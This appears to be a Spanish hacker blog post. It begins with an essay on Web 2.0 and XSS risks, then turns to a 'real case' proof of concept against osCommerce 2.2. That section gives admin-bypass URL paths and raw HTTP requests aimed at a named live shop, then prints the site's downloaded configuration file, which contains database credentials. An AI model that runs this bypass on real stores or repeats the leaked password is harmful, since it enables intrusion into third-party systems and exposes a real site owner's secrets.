XSS Web 2.0 - "spread the world"

XSS Web 2.0 – Spread The World

Web 2.0 - "Spread The World"

Como es muy conocido nos encontramos en la era de la denominada "web 2.0"; quizás muchas personas no comprendan la relevancia o el significado mediático de lo que esto representa.

La web 2.0 se resume en el movimiento social "la conexión" el "enlace" los websites orientados a compartir información, la interoperabilidad entre usuarios, las comunidades, blogs, servicios de almacenamiento, redes sociales, wikis, alojamiento de videos, etc.

Denominada asi en parte por la evolucion del HTML estatico e intercambio de datos de forma pasiva, frente a la revolucion de los lenguajes, plataformas, arquitectura de sistemas, implementaron nuevas funciones a las paginas webs.

Google con DoubleClick (web 1.0) ahora, Google AdSense (web 2.0).

Ofoto en Web 1.0; Flickr es Web 2.0

Terratv web 1.0 Youtube Web 2.0

Claros ejemplos del desarrollo web y las tecnologias implementadas en los servicios, entre los mas resaltantes:

Blogs

-Blogger

-Wordpress

Wikis

-Wikispaces

-Wikipedia

Almacenamiento

-ShareFiles

-RapidShare

Comunidades

-HI5

-Ning

Fotos / Videos

-Flickr

-Youtube

Plataformas independientes, open sources, CMS con desarrollo de lenguajes interactivos:

CSS

XHTML

AJAX

Java Web Start

XUL

Redifusión/Agregación de datos en RSS/ATOM

Soporte para postear en un blog

JCC y APIs REST o XML

JSON

Mashup (aplicación web híbrida)

Con el uso de nuevas tecnologías en el desarrollo web tales como la implementación de nuevos lenguajes web ( JSON, JAVA, AJAX, XHTML, XML). Todo se interconecta, podemos publicar nuestro estado de ánimo en el twitter, y a la vez conectar los mensajes a nuestro facebook, compartir los feeds, las noticias a nuestra cuenta de correo, la interconexión entre usuarios beneficia a muchas personas permite compartir información en tiempo real con el mundo y al mismo tiempo socializar con usuarios en todo el mundo.

A medida que evoluciona este fenómeno, los riesgos en la seguridad de la información se vuelve una necesidad, precisamos estar seguros, compartir nuestra información de manera segura y eficiente.

¿Puede ser esto posible en la web 2.0?

Definitivamente NO, muchos websites son vulnerables a distintos tipos de ataque web, errores en el filtrado de datos crean pequeños agujeros llamados "bugs", de los cuales se vale un atacante para ejecutar comandos arbitrarios y/o hacer una escalada de privilegios, al mismo tiempo la suplantación de identificación es una preocupación diaria para las empresas de seguridad informática, los constantes fallos como “cross site scripting” (a.k.a XSS por sus siglas en ingles). son usados en el robo de credenciales,phishing attacks, hijacking, clickhacking etc.

La mala validación de datos permite ejecutar “Tags NO Permitidos” en muchas páginas webs, así compartir "mala o falsa información" en distintas redes sociales.

Una página puede contener fallos en el diseño, en su filtrado de tags html y llevar a la explotación de distintos recursos para un atacante variantes como la ofuscación de datos, SQL inyecciones, XSS, CRSF, XCSS.

Explotando software vulnerable, hoy en día muchas empresas de software se encuentran afectadas adobe y los PDFs, Microsoft y su ASP FRAMEWORK, nuevos fallos aparecen diariamente, parches son liberados, pareciera que mantienen en asincrónico equilibrio.

XSS en Flickr y Blogger - "Spread The World"

xss by sh3n

xss
Originally uploaded by s.h.e.n

osComerce - Descargando Archivos?

Saludos, en esta oportunidad explotando una vulnerabilidad ya conocida en osCommerce 2.2.
para mas referencias:
/admin/file_manager.php/login.php?sh3n=do #Bypass /admin (podemos ver archivos)
/admin/backup.php/login.php?sh3n=do #Backup
/admin/file_manager.php/login.php?action=download&filename=sh3n.php #Descarga

#########################################################
# P.O.C - Prueba de Concepto - Real Case #
#########################################################
//El webmaster fue notificado previamente
//Get phun by sh3n

POST /admin/file_manager.php/login.php?sh3n=do
Host: sunnybunny.eu
Content-Type: application/x-www-form-urlencoded
Content-Length: 80


Descargando "Config.php"
Como muchos saben el config file es un archivo donde encontramos datos sobre la coneccion de la base de datos etc. Con una simple peticion podemos descargarlo..

GET admin/file_manager.php/login.php?action=download&filename=/includes/configure.php
Host: sunnybunny.eu
Content-Type: application/x-www-form-urlencoded

Content-Length: 80

define('HTTP_SERVER', 'http://sunnybunny.eu');
define('HTTPS_SERVER', 'https://sunnybunny.eu');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'sunnybunny.eu');
define('HTTPS_COOKIE_DOMAIN', 'sunnybunny.eu');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_BOXES', DIR_WS_INCLUDES . 'boxes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');

define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', '/home/kakdaspe/public_html/sunnybunny.eu/');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');

define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'kakdaspe_osc1');
define('DB_SERVER_PASSWORD', 'QQ7[cmqRncKn');
define('DB_DATABASE', 'kakdaspe_osc1');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>